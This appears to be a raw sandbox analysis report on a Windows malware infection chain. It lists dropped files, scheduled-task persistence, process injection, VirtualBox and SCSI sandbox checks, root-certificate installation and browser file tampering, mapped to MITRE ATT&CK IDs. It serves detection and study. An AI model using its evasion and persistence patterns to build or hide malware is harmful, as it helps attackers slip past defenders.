File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	5Gh6FarKzvCmEvFvlH608SC5.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	JkNVuim.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	5Gh6FarKzvCmEvFvlH608SC5.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	Oyazleo.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	5Gh6FarKzvCmEvFvlH608SC5.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	5Gh6FarKzvCmEvFvlH608SC5.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	JkNVuim.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	Oyazleo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	JkNVuim.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
4744	amert.exe
5088	explorha.exe
708	explorha.exe
5460	5Gh6FarKzvCmEvFvlH608SC5.exe
4432	explorha.exe
6348	explorha.exe
2012	explorha.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2836 set thread context of 5080	2836	swiiiii.exe	79
PID 2428 set thread context of 1096	2428	swiy.exe	87
PID 4912 set thread context of 4932	4912	file300un.exe	91
PID 5396 set thread context of 5428	5396	gold.exe	109
PID 5684 set thread context of 5672	5684	alexxxxxxxx.exe	130

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	AEY6uLsOwAVuhQ9weg2lKxi4.exe
File opened (read-only)	\??\VBoxMiniRdrDN	Jw2APj9A3AIg1Sx09xCCBO2x.exe
File opened (read-only)	\??\VBoxMiniRdrDN	zFin8p9T2XaFxNzDfLsRDA3Q.exe
File opened (read-only)	\??\VBoxMiniRdrDN	PdLV4NcQzwxOS6sHtzFXCla9.exe

Drops file in Program Files directory 39 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	JkNVuim.exe
File created	C:\Program Files (x86)\ADJLsahCU\GINQSa.dll	Oyazleo.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	Oyazleo.exe
File created	C:\Program Files (x86)\ADJLsahCU\CpQjtVX.xml	JkNVuim.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\WglLqbr.dll	Oyazleo.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\MrIBSXa.dll	Oyazleo.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\CMgrMev.dll	JkNVuim.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	JkNVuim.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\BlkSZqS.xml	Oyazleo.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\BsSCsFL.xml	Oyazleo.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\bGZIwNpQxSiaG.dll	Oyazleo.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\OszZKla.dll	Oyazleo.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	Oyazleo.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\PdJoQla.xml	JkNVuim.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\FNDTiYc.xml	Oyazleo.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\JtCJJlw.dll	JkNVuim.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\NaqyPwk.dll	JkNVuim.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\eYVAhBFzNsftE.dll	JkNVuim.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\pssCrHw.xml	JkNVuim.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	JkNVuim.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	JkNVuim.exe
File created	C:\Program Files (x86)\ADJLsahCU\DyQSDDl.xml	Oyazleo.exe
File created	C:\Program Files (x86)\ADJLsahCU\YABzst.dll	JkNVuim.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	JkNVuim.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\rAGznef.xml	JkNVuim.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorha.job	amert.exe
File created	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File created	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File created	C:\Windows\Tasks\rrqYunoktxOQmCoCX.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	AEY6uLsOwAVuhQ9weg2lKxi4.exe
File opened for modification	C:\Windows\rss	zFin8p9T2XaFxNzDfLsRDA3Q.exe
File created	C:\Windows\rss\csrss.exe	zFin8p9T2XaFxNzDfLsRDA3Q.exe
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\rss	Jw2APj9A3AIg1Sx09xCCBO2x.exe
File created	C:\Windows\rss\csrss.exe	Jw2APj9A3AIg1Sx09xCCBO2x.exe
File created	C:\Windows\Tasks\explorta.job	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe
File opened for modification	C:\Windows\rss	AEY6uLsOwAVuhQ9weg2lKxi4.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6604	sc.exe
6732	sc.exe
6992	sc.exe
5480	sc.exe
6004	sc.exe
5452	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2616	2836	WerFault.exe	77
5700	5684	WerFault.exe	129
4560	428	WerFault.exe	388

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4ck.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4rw.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4rw.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4rw.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4ck.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4ck.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u4ck.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u4ck.0.exe

Creates scheduled task(s) 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2736	schtasks.exe
4716	schtasks.exe
2280	schtasks.exe
1324	schtasks.exe
5244	schtasks.exe
6448	schtasks.exe
2676	schtasks.exe
4972	schtasks.exe
32	schtasks.exe
1980	schtasks.exe
5440	schtasks.exe
6032	schtasks.exe
5876	schtasks.exe
6428	schtasks.exe
708	schtasks.exe
5328	schtasks.exe
500	schtasks.exe
5448	schtasks.exe
5188	schtasks.exe
5560	schtasks.exe
6152	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
7012	timeout.exe
5420	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
1936	tasklist.exe
6088	tasklist.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	Install.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	AEY6uLsOwAVuhQ9weg2lKxi4.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
